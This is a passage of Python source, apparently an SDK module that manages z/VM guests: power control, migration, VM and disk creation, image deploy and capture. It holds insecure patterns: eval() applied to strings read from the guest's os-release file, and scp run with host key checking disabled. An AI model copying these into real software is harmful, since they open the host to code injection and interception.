"SMAPI %s API Virtual_Network_Adapter_Query_Extended" % userid,
"--operands",
"-k 'image_device_number=*'"))
results = None
action = "get network info of userid '%s'" % str(userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ret = results['response']
# TODO: muti NIC support?
nic_count = 0
for line in ret:
if 'adapter_count=' in line:
nic_count = int(line.strip().split('=')[-1])
break
if nic_count < 1:
msg = 'get_network_info:No NIC found on userid %s' % userid
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# save network info into dict by index from 1 to nic_count
# Firstly, get adapter information
adapters_info = []
adapter = dict()
# if found IP, no need to continue
found_mac = False
for line in ret:
if 'adapter_address=' in line:
adapter_addr = line.strip().split('=')[-1]
adapter['adapter_address'] = adapter_addr
if 'adapter_status=' in line:
adapter_type = line.strip().split('=')[-1]
adapter['adapter_status'] = adapter_type
if 'lan_owner=' in line:
lan_owner = line.strip().split('=')[-1]
adapter['lan_owner'] = lan_owner
if 'lan_name=' in line:
lan_name = line.strip().split('=')[-1]
adapter['lan_name'] = lan_name
if 'mac_address=' in line and not found_mac:
mac_addr = line.strip().split('=')[-1]
pattern = re.compile('.{2}')
mac_address = ':'.join(pattern.findall(mac_addr))
adapter['mac_address'] = mac_address
if 'mac_ip_version=' in line:
ip_version = line.strip().split('=')[-1]
adapter['mac_ip_version'] = ip_version
if 'mac_ip_address=' in line:
# once we found mac_ip_address, assume this is the MAC
# we are using, then jump to next adapter
mac_ip = line.strip().split('=')[-1]
adapter['mac_ip_address'] = mac_ip
found_mac = True
if 'adapter_info_end' in line:
adapters_info.append(adapter)
# clear adapter and process next
adapter = dict()
found_mac = False
return adapters_info
def _parse_vswitch_inspect_data(self, rd_list):
""" Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get
inspect data.
"""
def _parse_value(data_list, idx, keyword, offset):
return idx + offset, data_list[idx].rpartition(keyword)[2].strip()
vsw_dict = {}
with zvmutils.expect_invalid_resp_data():
# vswitch count
idx = 0
idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2)
vsw_dict['vswitch_count'] = int(vsw_count)
# deal with each vswitch data
vsw_dict['vswitches'] = []
for i in range(vsw_dict['vswitch_count']):
vsw_data = {}
# skip vswitch number
idx += 1
# vswitch name
idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1)
vsw_data['vswitch_name'] = vsw_name
# uplink count
idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1)
# skip uplink data
idx += int(up_count) * 9
# skip bridge data
idx += 8
# nic count
vsw_data['nics'] = []
idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1)
nic_count = int(nic_count)
for j in range(nic_count):
nic_data = {}
idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1)
userid, toss, vdev = nic_id.partition(' ')
nic_data['userid'] = userid
nic_data['vdev'] = vdev
idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx,
'nic_fr_rx:', 1
)
idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_rx_dsc:', 1
)
idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx,
'nic_fr_rx_err:', 1
)
idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx,
'nic_fr_tx:', 1
)
idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_tx_dsc:', 1
)
idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx,
'nic_fr_tx_err:', 1
)
idx, nic_data['nic_rx'] = _parse_value(rd_list, idx,
'nic_rx:', 1
)
idx, nic_data['nic_tx'] = _parse_value(rd_list, idx,
'nic_tx:', 1
)
vsw_data['nics'].append(nic_data)
# vlan count
idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1)
# skip vlan data
idx += int(vlan_count) * 3
# skip the blank line
idx += 1
vsw_dict['vswitches'].append(vsw_data)
return vsw_dict
def _is_vdev_valid(self, vdev, vdev_info):
for used_vdev in vdev_info:
if (((int(vdev, 16) >= int(used_vdev, 16)) and
(int(vdev, 16) <= int(used_vdev, 16) + 2)) or
((int(vdev, 16) < int(used_vdev, 16)) and
(int(vdev, 16) >= int(used_vdev, 16) - 2))):
return False
return True
def get_power_state(self, userid):
"""Get power status of a z/VM instance."""
LOG.debug('Querying power stat of %s' % userid)
requestData = "PowerVM " + userid + " status"
action = "query power state of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(requestData)
with zvmutils.expect_invalid_resp_data(results):
status = results['response'][0].partition(': ')[2]
return status
def _check_power_state(self, userid, action):
# Get the vm status
power_state = self.get_power_state(userid)
# Power on the vm if it is inactive
if power_state == 'off':
msg = ('The vm %s is powered off, please start up it '
'before %s' % (userid, action))
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
def guest_start(self, userid):
"""Power on VM."""
requestData = "PowerVM " + userid + " on"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_stop(self, userid, **kwargs):
"""Power off VM."""
requestData = "PowerVM " + userid + " off"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_softstop(self, userid, **kwargs):
"""Power off VM gracefully, it will call shutdown os then
deactivate vm"""
requestData = "PowerVM " + userid + " softoff --wait"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
else:
requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout)
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
else:
requestData += ' --poll ' + str(CONF.guest.softstop_interval)
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_pause(self, userid):
self._check_power_state(userid, 'pause')
requestData = "PowerVM " + userid + " pause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_unpause(self, userid):
self._check_power_state(userid, 'unpause')
requestData = "PowerVM " + userid + " unpause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reboot(self, userid):
requestData = ' '.join(("PowerVM", userid, "reboot"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reset(self, userid):
requestData = ' '.join(("PowerVM", userid, "reset"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def live_migrate_move(self, userid, destination, parms):
""" moves the specified virtual machine, while it continues to run,
to the specified system within the SSI cluster. """
rd = ('migratevm %(uid)s move --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
if 'maxtotal' in parms:
rd += ('--maxtotal ' + str(parms['maxTotal']))
if 'maxquiesce' in parms:
rd += ('--maxquiesce ' + str(parms['maxquiesce']))
if 'immediate' in parms:
rd += " --immediate"
if 'forcearch' in parms:
rd += " --forcearch"
if 'forcedomain' in parms:
rd += " --forcedomain"
if 'forcestorage' in parms:
rd += " --forcestorage"
action = "move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def live_migrate_test(self, userid, destination):
""" tests the specified virtual machine and reports whether or not
it is eligible to be relocated to the specified system. """
rd = ('migratevm %(uid)s test --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
action = "test to move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def _get_ipl_param(self, ipl_from):
if len(ipl_from) > 0:
ipl_param = ipl_from
else:
ipl_param = CONF.zvm.user_root_vdev
return ipl_param
def create_vm(self, userid, cpu, memory, disk_list, profile,
max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam,
dedicate_vdevs, loaddev):
""" Create VM and add disks if specified. """
rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s '
'--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i '
'--maxMemSize %(max_mem)s --setReservedMem' %
{'uid': userid, 'mem': memory,
'pri': const.ZVM_USER_DEFAULT_PRIVILEGE,
'cpu': cpu, 'prof': profile,
'max_cpu': max_cpu, 'max_mem': max_mem})
if CONF.zvm.default_admin_userid:
rd += (' --logonby "%s"' % CONF.zvm.default_admin_userid)
# when use dasd as root disk, the disk_list[0] would be the boot
# disk.
# when boot from volume, ipl_from should be specified explicitly.
if (disk_list and 'is_boot_disk' in disk_list[0] and
disk_list[0]['is_boot_disk']) or ipl_from:
# we assume at least one disk exist, which means, is_boot_disk
# is true for exactly one disk.
rd += (' --ipl %s' % self._get_ipl_param(ipl_from))
# load param for ipl
if ipl_param:
rd += ' --iplParam %s' % ipl_param
if ipl_loadparam:
rd += ' --iplLoadparam %s' % ipl_loadparam
if dedicate_vdevs:
rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs)
if loaddev:
if 'portname' in loaddev:
rd += ' --loadportname %s' % loaddev['portname']
if 'lun' in loaddev:
rd += ' --loadlun %s' % loaddev['lun']
# now, we need consider swap only case, customer using boot
# from volume but no disk pool provided, we allow to create
# swap disk from vdisk by default, when we come to this logic
# we are very sure that if no disk pool, there is only one
# disk in disk_list and that's swap
vdisk = None
# this is swap only case, which means, you only create a swap
# disk (len disk_list is 1) and no other disks
if len(disk_list) == 1:
disk = disk_list[0]
if 'format' in disk and disk['format'].lower() == 'swap':
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
if disk_pool is None:
# if it's vdisk, then create user direct directly
vd = disk.get('vdev') or self.generate_disk_vdev(offset=0)
disk['vdev'] = vd
sizeUpper = disk['size'].strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'M' and sizeUnit != 'G':
errmsg = ("%s must has 'M' or 'G' suffix" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
rd += ' --vdisk %s:%s' % (vd, sizeUpper)
vdisk = disk
action = "create userid '%s'" % userid
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 436) and (err.results['rs'] == 4)):
result = "Profile '%s'" % profile
raise exception.SDKObjectNotExistError(obj_desc=result,
modID='guest')
else:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
# Add the guest to db immediately after user created
action = "add guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.add_guest(userid)
# Continue to add disk, if vdisk is None, it means
# it's not vdisk routine and we need add disks
if vdisk is None and disk_list:
# not perform mkfs against root disk
if disk_list[0].get('is_boot_disk'):
disk_list[0].update({'format': 'none'})
return self.add_mdisks(userid, disk_list)
# we must return swap disk in order to make guest config
# handle other remaining jobs
return disk_list
def _add_mdisk(self, userid, disk, vdev):
"""Create one disk for userid
NOTE: No read, write and multi password specified, and
access mode default as 'MR'.
"""
size = disk['size']
fmt = disk.get('format', 'ext4')
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
# Check disk_pool, if it's None, report error
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
action = 'add3390'
else:
action = 'add9336'
rd = ' '.join(['changevm', userid, action, diskpool_name,
vdev, size, '--mode MR'])
if fmt and fmt != 'none':
rd += (' --filesystem %s' % fmt.lower())
action = "add mdisk to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_vm_list(self):
"""Get the list of guests that are created by SDK
return userid list"""
action = "list all guests in database"
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.get_guest_list()
guests_migrated = \
self._GuestDbOperator.get_migrated_guest_info_list()
# db query return value in tuple (uuid, userid, metadata, comments)
userids_in_db = [g[1].upper() for g in guests_in_db]
userids_migrated = [g[1].upper() for g in guests_migrated]
userid_list = list(set(userids_in_db) - set(userids_migrated))
return userid_list
def _remove_mdisk(self, userid, vdev):
rd = ' '.join(('changevm', userid, 'removedisk', vdev))
action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def guest_authorize_iucv_client(self, userid, client=None):
"""Punch a script that used to set the authorized client userid in vm
If the guest is in log off status, the change will take effect when
the guest start up at first time.
If the guest is in active status, power off and power on are needed
for the change to take effect.
:param str guest: the user id of the vm
:param str client: the user id of the client that can communicate to
guest using IUCV"""
client = client or zvmutils.get_smt_userid()
iucv_path = "/tmp/" + userid
if not os.path.exists(iucv_path):
os.makedirs(iucv_path)
iucv_auth_file = iucv_path + "/iucvauth.sh"
zvmutils.generate_iucv_authfile(iucv_auth_file, client)
try:
requestData = "ChangeVM " + userid + " punchfile " + \
iucv_auth_file + " --class x"
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:"
" %s" % (userid, err.format_message()))
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
finally:
self._pathutils.clean_temp_folder(iucv_path)
def volume_refresh_bootmap(self, fcpchannels, wwpns, lun, skipzipl=False):
""" Refresh bootmap info of specific volume.
: param fcpchannels: list of fcpchannels.
: param wwpns: list of wwpns.
: param lun: string of lun.
: return value: list of FCP devices and physical wwpns.
"""
fcps = ','.join(fcpchannels)
ws = ','.join(wwpns)
fcs = "--fcpchannel=%s" % fcps
wwpns = "--wwpn=%s" % ws
lun = "--lun=%s" % lun
if skipzipl:
skipzipl = "--skipzipl=YES"
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun,
skipzipl]
else:
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun]
LOG.info("Running command: %s", cmd)
with zvmutils.expect_and_reraise_internal_error(
modID='refresh_bootmap'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("refresh_bootmap failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKVolumeOperationError(rs=5,
errcode=rc,
errmsg=err_output)
output_lines = output.split('\n')
res_wwpns = []
res_fcps = []
for line in output_lines:
if line.__contains__("WWPNs: "):
wwpns = line[7:]
# Convert string to list by space
res_wwpns = wwpns.split()
if line.__contains__("FCPs: "):
fcps = line[6:]
# Convert string to list by space
res_fcps = fcps.split()
return res_wwpns, res_fcps
def guest_deploy(self, userid, image_name, transportfiles=None,
remotehost=None, vdev=None, skipdiskcopy=False):
""" Deploy image and punch config driver to target """
# (TODO: add the support of multiple disks deploy)
if skipdiskcopy:
msg = ('Start guest_deploy without unpackdiskimage, guest: %(vm)s'
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
# Purge guest reader to clean dirty data
rd = ("changevm %s purgerdr" % userid)
action = "purge reader of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
# Punch transport files if specified
if transportfiles:
# Copy transport file to local
msg = ('Start to send customized file to vm %s' % userid)
LOG.info(msg)
try:
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
if remotehost:
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
else:
cmd = ["/usr/bin/cp", transportfiles, local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy config drive with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
# Punch config drive to guest userid
rd = ("changevm %(uid)s punchfile %(file)s --class X" %
{'uid': userid, 'file': local_trans})
action = "punch config drive to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
finally:
# remove the local temp config drive folder
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Authorize iucv client
client_id = None
# try to re-use previous iucv authorized userid at first
if os.path.exists(const.IUCV_AUTH_USERID_PATH):
LOG.debug("Re-use previous iucv authorized userid")
with open(const.IUCV_AUTH_USERID_PATH) as f:
client_id = f.read().strip()
self.guest_authorize_iucv_client(userid, client_id)
# Update os version in guest metadata
# TODO: may should append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
image_info = self._ImageDbOperator.image_query_record(image_name)
os_version = image_info[0]['imageosdistro']
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without unpackdiskimage finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_deploy_rhcos(self, userid, image_name, transportfiles,
remotehost=None, vdev=None, hostname=None,
skipdiskcopy=False):
""" Deploy image"""
# (TODO: add the support of multiple disks deploy)
if transportfiles is None:
err_msg = 'Ignition file is required when deploying RHCOS image'
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=13, userid=userid)
if skipdiskcopy:
msg = ('Start guest_deploy without copy disk, guest: %(vm)s'
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = None
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
tmp_trans_dir = None
try:
if remotehost:
# download igintion file from remote host
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy ignition file with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
transportfiles = local_trans
cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name,
transportfiles, vdev,
image_file, hostname,
skipdiskcopy)
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
finally:
# remove the temp ignition file
if tmp_trans_dir:
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Update os version in guest metadata
# TODO: may should append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
os_version = self.image_get_os_distro(image_name)
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without copy disk finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_capture(self, userid, image_name, capture_type='rootonly',
compress_level=6):
if capture_type == "alldisks":
func = ('Capture guest with type: %s' % capture_type)
msg = ('%s is not supported in current release' % func)
LOG.error(msg)
raise exception.SDKFunctionNotImplementError(func=func,
modID='guest')
msg = ('Start to capture %(vm)s to generate image %(img)s with '
'capture type %(type)s' % {'vm': userid,
'img': image_name,
'type': capture_type})
LOG.info(msg)
self._check_power_state(userid, 'capture')
# Make sure the iucv channel is ready for communication on source vm
try:
self.execute_cmd(userid, 'pwd')
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to check iucv status on capture source vm '
'%(vm)s with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Get the os version of the vm
try:
os_version = self._guest_get_os_version(userid)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on capture source vm %(vm)s'
'to get os version with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Error happened when parsing os version on source vm '
'%(vm)s with error: %(err)s' % {'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
msg = ('The os version of capture source vm %(vm)s is %(version)s' %
{'vm': userid,
'version': os_version})
LOG.info(msg)
# Find the root device according to the capture type
try:
capture_devices = self._get_capture_devices(userid, capture_type)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on source vm %(vm)s to get the '
'devices for capture with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Internal error happened when getting the devices for '
'capture on source vm %(vm)s with error %(err)s' %
{'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except exception.SDKGuestOperationError:
raise
# Shutdown the vm before capture
self.guest_softstop(userid)
# Prepare directory for writing image file
image_temp_dir = '/'.join((CONF.image.sdk_image_repository,
const.IMAGE_TYPE['CAPTURE'],
os_version,
image_name))
self._pathutils.mkdir_if_not_exist(image_temp_dir)
# Call creatediskimage to capture a vm to generate an image
# TODO:(nafei) to support multiple disk capture
vdev = capture_devices[0]
msg = ('Found the device %(vdev)s of %(vm)s for capture' %
{'vdev': vdev, 'vm': userid})
LOG.info(msg)
image_file_name = vdev
image_file_path = '/'.join((image_temp_dir, image_file_name))
cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev,
image_file_path, '--compression', str(compress_level)]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("creatediskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
self._pathutils.clean_temp_folder(image_temp_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=err_output)
# Move the generated image to netboot folder
image_final_dir = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
os_version,
image_name])
image_final_path = '/'.join((image_final_dir,
image_file_name))
self._pathutils.mkdir_if_not_exist(image_final_dir)
cmd = ['mv', image_file_path, image_final_path]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("move image file from staging to netboot "
"folder failed with return code: %d." % rc)
LOG.error(err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
self._pathutils.clean_temp_folder(image_final_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
err=err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
msg = ('Updating the metadata for captured image %s ' % image_name)
LOG.info(msg)
# Get md5sum of image
real_md5sum = self._get_md5sum(image_final_path)
# Get disk_size_units of image
disk_size_units = self._get_disk_size_units(image_final_path)
# Get the image physical size
image_size = self._get_image_size(image_final_path)
# Create the image record in image database
self._ImageDbOperator.image_add_record(image_name, os_version,
real_md5sum, disk_size_units, image_size,
capture_type)
LOG.info('Image %s is captured and imported to image repository '
'successfully' % image_name)
def _guest_get_os_version(self, userid):
os_version = ''
release_file = self.execute_cmd(userid, 'ls /etc/*-release')
if '/etc/os-release' in release_file:
# Parse os-release file, part of the output looks like:
# NAME="Red Hat Enterprise Linux Server"
# ID="rhel"
# VERSION_ID="7.0"
release_info = self.execute_cmd(userid, 'cat /etc/os-release')
release_dict = {}
for item in release_info:
if item:
release_dict[item.split('=')[0]] = item.split('=')[1]
distro = release_dict['ID']
version = release_dict['VERSION_ID']
if '"' in distro:
distro = eval(distro)
if '"' in version:
version = eval(version)
os_version = '%s%s' % (distro, version)
return os_version
elif '/etc/redhat-release' in release_file:
# The output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/redhat-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
elif '/etc/SuSE-release' in release_file:
# The output for this file looks like:
# SUSE Linux Enterprise Server 11 (s390x)
# VERSION = 11
# PATCHLEVEL = 3
distro = 'sles'
release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release')
LOG.debug('OS release info is %s' % release_info)
release_version = '.'.join((release_info[1].split('=')[1].strip(),
release_info[2].split('=')[1].strip()))
os_version = ''.join((distro, release_version))
return os_version
elif '/etc/system-release' in release_file:
# For some rhel6.7 system, it only have system-release file and
# the output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/system-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
def _get_capture_devices(self, userid, capture_type='rootonly'):
capture_devices = []
if capture_type == 'rootonly':
# Parse the /proc/cmdline to get root devices
proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline '
'| tr " " "\\n" | grep -a "^root=" | cut -c6-')
root_device_info = proc_cmdline[0]
if not root_device_info:
msg = ('Unable to get useful info from /proc/cmdline to '
'locate the device associated with the root directory '
'on capture source vm %s' % userid)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
if 'UUID=' in root_device_info:
uuid = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-uuid', uuid))
elif 'LABEL=' in root_device_info:
label = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-label', label))
elif 'mapper' in root_device_info:
msg = ('Capturing a disk with root filesystem on logical'
' volume is not supported')
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
root_device = root_device_info
root_device_node = self.execute_cmd(userid, 'readlink -f %s' %
root_device)[0]
# Get device node vdev by node name
cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' %
root_device_node.split('/')[-1].rstrip(string.digits))
result = self.execute_cmd(userid, cmd)[0]
root_device_vdev = result.split()[0][4:8]
capture_devices.append(root_device_vdev)
return capture_devices
else:
# For sysclone, parse the user directory entry to get the devices
# for capture, leave for future
pass
def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name,
transportfiles=None, vdev=None,
image_file=None, hostname=None,
skipdiskcopy=False):
if skipdiskcopy:
os_version = image_name
image_disk_type = 'SCSI'
else:
os_version = self.image_get_os_distro(image_name)
# Query image disk type
image_disk_type = self._get_image_disk_type(image_name)
if image_disk_type is None:
err_msg = ("failed to get image disk type for "
"image '%(image_name)s'."
% {'image_name': image_name})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
try:
# Query vm's disk pool type and image disk type
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist(os_version)()
# Read coros fixed ip parameter from tempfile
fixed_ip_parameter = linuxdist.read_coreos_parameter(userid)
except Exception as err:
err_msg = ("failed to read coreos fixed ip "
"parameters for userid '%(userid)s',"
"error: %(err)s."
% {'userid': userid, 'err': err})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if fixed_ip_parameter is None:
err_msg = ("coreos fixed ip parameters don't exist.")
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if hostname:
# replace hostname to display name instead of userid
fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(),
hostname)
# read nic device id and change it into the form like
# "0.0.1000,0.0.1001,0.0.1002"
